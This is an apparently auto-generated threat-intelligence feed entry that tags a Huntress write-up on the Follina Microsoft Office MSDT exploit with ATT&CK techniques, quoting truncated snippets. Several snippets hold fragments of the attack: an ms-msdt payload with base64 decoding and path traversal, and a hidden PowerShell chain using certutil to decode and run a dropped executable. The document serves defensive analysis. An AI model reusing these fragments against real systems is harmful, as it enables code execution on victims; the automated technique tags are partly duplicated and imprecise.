TTPwire Vol. 1 · MITRE ATT&CK Tagged


Huntress

Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack | Huntress

2022-05-30

ATT&CK techniques detected

14 predictions
T1203 · Exploitation for Client Execution · 97%
“Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack | Huntress. This post, as is the norm for emerging threats, is a developing article and may be subject to change as the Huntress team learns more about this attack vector and new information is available. Update 4: 5…”

T1059.001 · PowerShell · 85%
“+ 'FromBase64String(' + [char]34 + '==' + [char]34 + '))'))))i/../../../../../../../../../../../../../../windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_auto\""; This looks to be the crux of the exploit. Using a schema for …”

T1055.001 · Dynamic-link Library Injection · 81%
“+ 'FromBase64String(' + [char]34 + '==' + [char]34 + '))'))))i/../../../../../../../../../../../../../../windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_auto\""; This looks to be the crux of the exploit. Using a schema for …”

T1055.001 · Dynamic-link Library Injection · 75%
“Run’s dynamic analysis. This was the original contents of rdf842l.html: This HTML document begins with a script tag and includes a significant amount of commented A characters, which (considering they are just comments) would seem to serve no …”

T1055.001 · Dynamic-link Library Injection · 73%
“exe"; Start-Process $cmd -WindowStyle hidden -ArgumentList "/c cd c:\users\public\ && for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y && findstr tvndrgaaaa 1.rar > 1.t && certutil -decode 1.t 1.c && expand 1.c -f:*. && rgb.ex…”

T1204.002 · Malicious File · 72%
“vigilant about opening any attachments. They should also be made aware that this exploit can be triggered with a hover-preview of a downloaded file that does not require any clicks (post download). There are additional suggestions for mitigation actions at the bottom of this …”

T1204.002 · Malicious File · 57%
“/msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ - https://msrc.microsoft.com/update-guide/en-us/vulnerability/cve-2022-30190 Jump links: The non-technical versi…”

T1221 · Template Injection · 51%
“vigilant about opening any attachments. They should also be made aware that this exploit can be triggered with a hover-preview of a downloaded file that does not require any clicks (post download). There are additional suggestions for mitigation actions at the bottom of this …”

T1204 · User Execution · 51%
“compressed inside the 1.c cab file) The impact of rgb.exe specifically is unknown, but the important takeaway is that this is a novel initial access technique that readily offers threat actors code execution with just a single click — or less. This is an enticing attack for ad…”

T1204.002 · Malicious File · 47%
“compressed inside the 1.c cab file) The impact of rgb.exe specifically is unknown, but the important takeaway is that this is a novel initial access technique that readily offers threat actors code execution with just a single click — or less. This is an enticing attack for ad…”

T1059.001 · PowerShell · 43%
“stepped in. Rich Warren shared a blog from Bill Demirkapi indicating there was a hardcoded buffer size for an HTML processing function, and we were able to confirm any files with fewer than 4096 bytes would not invoke the payload. Following even more tinkering, we noticed some sy…”

T1204.002 · Malicious File · 41%
“stepped in. Rich Warren shared a blog from Bill Demirkapi indicating there was a hardcoded buffer size for an HTML processing function, and we were able to confirm any files with fewer than 4096 bytes would not invoke the payload. Following even more tinkering, we noticed some sy…”

T1059.001 · PowerShell · 38%
“would execute via PowerShell, but spaces would break it - “.exe” must be the last trailing string present at the end of the IT_BrowseForFile parameter. While this is not by any means the most it could be compressed down to, we hope this shows how variants of this attack could …”

T1204.002 · Malicious File · 31%
“would execute via PowerShell, but spaces would break it - “.exe” must be the last trailing string present at the end of the IT_BrowseForFile parameter. While this is not by any means the most it could be compressed down to, we hope this shows how variants of this attack could …”

Summary

A new attack vector enables hackers to more easily compromise users with malicious Microsoft Office documents.